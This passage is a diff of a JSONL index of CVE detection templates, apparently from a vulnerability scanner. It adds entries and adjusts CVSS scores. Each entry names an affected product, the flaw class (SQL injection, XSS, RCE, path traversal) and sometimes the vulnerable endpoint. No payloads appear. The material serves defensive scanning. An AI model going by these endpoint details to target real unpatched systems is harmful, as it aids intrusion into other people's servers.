operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-32429.yaml"} +{"ID":"CVE-2022-32430","Info":{"Name":"Lin CMS Spring Boot - Default JWT Token","Severity":"high","Description":"An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-32430.yaml"} {"ID":"CVE-2022-32444","Info":{"Name":"u5cms v8.3.5 - Open Redirect","Severity":"medium","Description":"u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32444.yaml"} {"ID":"CVE-2022-32770","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32770.yaml"} {"ID":"CVE-2022-32771","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32771.yaml"} @@ -1879,6 +1891,7 @@ {"ID":"CVE-2022-40881","Info":{"Name":"SolarView 6.00 - Remote Command Execution","Severity":"critical","Description":"SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40881.yaml"} {"ID":"CVE-2022-4117","Info":{"Name":"WordPress IWS Geo Form Fields \u003c=1.0 - SQL Injection","Severity":"critical","Description":"WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4117.yaml"} {"ID":"CVE-2022-4140","Info":{"Name":"WordPress Welcart e-Commerce \u003c2.8.5 - Arbitrary File Access","Severity":"high","Description":"WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-4140.yaml"} +{"ID":"CVE-2022-41412","Info":{"Name":"perfSONAR 4.x \u003c= 4.4.4 - Server-Side Request Forgery","Severity":"high","Description":"An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2022/CVE-2022-41412.yaml"} {"ID":"CVE-2022-41441","Info":{"Name":"ReQlogic v11.3 - Cross Site Scripting","Severity":"medium","Description":"ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-41441.yaml"} {"ID":"CVE-2022-41473","Info":{"Name":"RPCMS 3.0.2 - Cross-Site Scripting","Severity":"medium","Description":"RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-41473.yaml"} {"ID":"CVE-2022-41840","Info":{"Name":"Welcart eCommerce \u003c=2.7.7 - Local File Inclusion","Severity":"critical","Description":"Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-41840.yaml"} @@ -1958,6 +1971,7 @@ {"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"} {"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"} {"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"} +{"ID":"CVE-2023-0159","Info":{"Name":"Extensive VC Addons for WPBakery page builder \u003c 1.9.1 - Unauthenticated RCE","Severity":"high","Description":"The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0159.yaml"} {"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"} {"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"} {"ID":"CVE-2023-0297","Info":{"Name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","Severity":"critical","Description":"Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0297.yaml"} @@ -1972,6 +1986,7 @@ {"ID":"CVE-2023-0602","Info":{"Name":"Twittee Text Tweet \u003c= 1.0.8 - Cross-Site Scripting","Severity":"medium","Description":"The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0602.yaml"} {"ID":"CVE-2023-0630","Info":{"Name":"Slimstat Analytics \u003c 4.9.3.3 Subscriber - SQL Injection","Severity":"high","Description":"The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0630.yaml"} {"ID":"CVE-2023-0669","Info":{"Name":"Fortra GoAnywhere MFT - Remote Code Execution","Severity":"high","Description":"Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0669.yaml"} +{"ID":"CVE-2023-0678","Info":{"Name":"PHPIPAM \u003cv1.5.1 - Missing Authorization","Severity":"medium","Description":"In phpIPAM 1.5.1, an unauthenticated user could download the list of high-usage IP subnets that contains sensitive information such as a subnet description, IP ranges, and usage rates via find_full_subnets.php endpoint. The bug lies in the fact that find_full_subnets.php does not verify if the user is authorized to access the data, and if the script was started from a command line.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-0678.yaml"} {"ID":"CVE-2023-0777","Info":{"Name":"modoboa 2.0.4 - Admin TakeOver","Severity":"critical","Description":"Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0777.yaml"} {"ID":"CVE-2023-0900","Info":{"Name":"AP Pricing Tables Lite \u003c= 1.1.6 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0900.yaml"} {"ID":"CVE-2023-0942","Info":{"Name":"WordPress Japanized for WooCommerce \u003c2.5.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0942.yaml"} @@ -2016,7 +2031,7 @@ {"ID":"CVE-2023-22515","Info":{"Name":"Atlassian Confluence - Privilege Escalation","Severity":"critical","Description":"Atlassian Confluence Data Center and Server contains a broken access control vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22515.yaml"} {"ID":"CVE-2023-22518","Info":{"Name":"Atlassian Confluence Server - Improper Authorization","Severity":"critical","Description":"All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22518.yaml"} {"ID":"CVE-2023-2252","Info":{"Name":"Directorist \u003c 7.5.4 - Local File Inclusion","Severity":"low","Description":"Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.\n","Classification":{"CVSSScore":"2.7"}},"file_path":"http/cves/2023/CVE-2023-2252.yaml"} -{"ID":"CVE-2023-22527","Info":{"Name":"Atlassian Confluence - Remote Code Execution","Severity":"critical","Description":"A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-22527.yaml"} +{"ID":"CVE-2023-22527","Info":{"Name":"Atlassian Confluence - Remote Code Execution","Severity":"critical","Description":"A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22527.yaml"} {"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"high","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"} {"ID":"CVE-2023-2272","Info":{"Name":"Tiempo.com \u003c= 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2272.yaml"} {"ID":"CVE-2023-22897","Info":{"Name":"Securepoint UTM - Leaking Remote Memory Contents","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-22897.yaml"} @@ -2042,6 +2057,7 @@ {"ID":"CVE-2023-2479","Info":{"Name":"Appium Desktop Server - Remote Code Execution","Severity":"critical","Description":"OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2479.yaml"} {"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"} {"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"} +{"ID":"CVE-2023-25194","Info":{"Name":"Apache Druid Kafka Connect - Remote Code Execution","Severity":"high","Description":"The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-25194.yaml"} {"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"} {"ID":"CVE-2023-25573","Info":{"Name":"Metersphere - Arbitrary File Read","Severity":"high","Description":"Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-25573.yaml"} {"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"} @@ -2067,7 +2083,7 @@ {"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"critical","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"} {"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"} {"ID":"CVE-2023-27639","Info":{"Name":"PrestaShop TshirteCommerce - Directory Traversal","Severity":"high","Description":"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27639.yaml"} -{"ID":"CVE-2023-27640","Info":{"Name":"PrestaShop tshirtecommerce - Directory Traversal","Severity":"high","Description":"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27640.yaml"} +{"ID":"CVE-2023-27640","Info":{"Name":"PrestaShop tshirtecommerce - Directory Traversal","Severity":"high","Description":"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27640.yaml"} {"ID":"CVE-2023-2766","Info":{"Name":"Weaver OA 9.5 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2766.yaml"} {"ID":"CVE-2023-2779","Info":{"Name":"Super Socializer \u003c 7.13.52 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2779.yaml"} {"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"} @@ -2144,6 +2160,7 @@ {"ID":"CVE-2023-3479","Info":{"Name":"Hestiacp \u003c= 1.7.7 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3479.yaml"} {"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"} {"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"critical","Description":"A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} +{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"} {"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"} {"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"} {"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"} @@ -2201,7 +2218,7 @@ {"ID":"CVE-2023-39700","Info":{"Name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39700.yaml"} {"ID":"CVE-2023-39796","Info":{"Name":"WBCE 1.6.0 - SQL Injection","Severity":"critical","Description":"There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39796.yaml"} {"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"} -{"ID":"CVE-2023-40355","Info":{"Name":"Axigen WebMail - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-40355.yaml"} +{"ID":"CVE-2023-40355","Info":{"Name":"Axigen WebMail - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-40355.yaml"} {"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"} {"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"} {"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"} @@ -2250,6 +2267,7 @@ {"ID":"CVE-2023-47115","Info":{"Name":"Label Studio - Cross-Site Scripting","Severity":"high","Description":"Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.\n","Classification":{"CVSSScore":"7.1"}},"file_path":"http/cves/2023/CVE-2023-47115.yaml"} {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"} {"ID":"CVE-2023-47211","Info":{"Name":"ManageEngine OpManager - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-47211.yaml"} +{"ID":"CVE-2023-47218","Info":{"Name":"QNAP QTS and QuTS Hero - OS Command Injection","Severity":"high","Description":"An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-47218.yaml"} {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"} {"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"} {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"} @@ -2278,31 +2296,34 @@ {"ID":"CVE-2023-6023","Info":{"Name":"VertaAI ModelDB - Path Traversal","Severity":"high","Description":"The endpoint \"/api/v1/artifact/getArtifact?artifact_path=\" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6023.yaml"} {"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"} {"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"} -{"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"high","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an 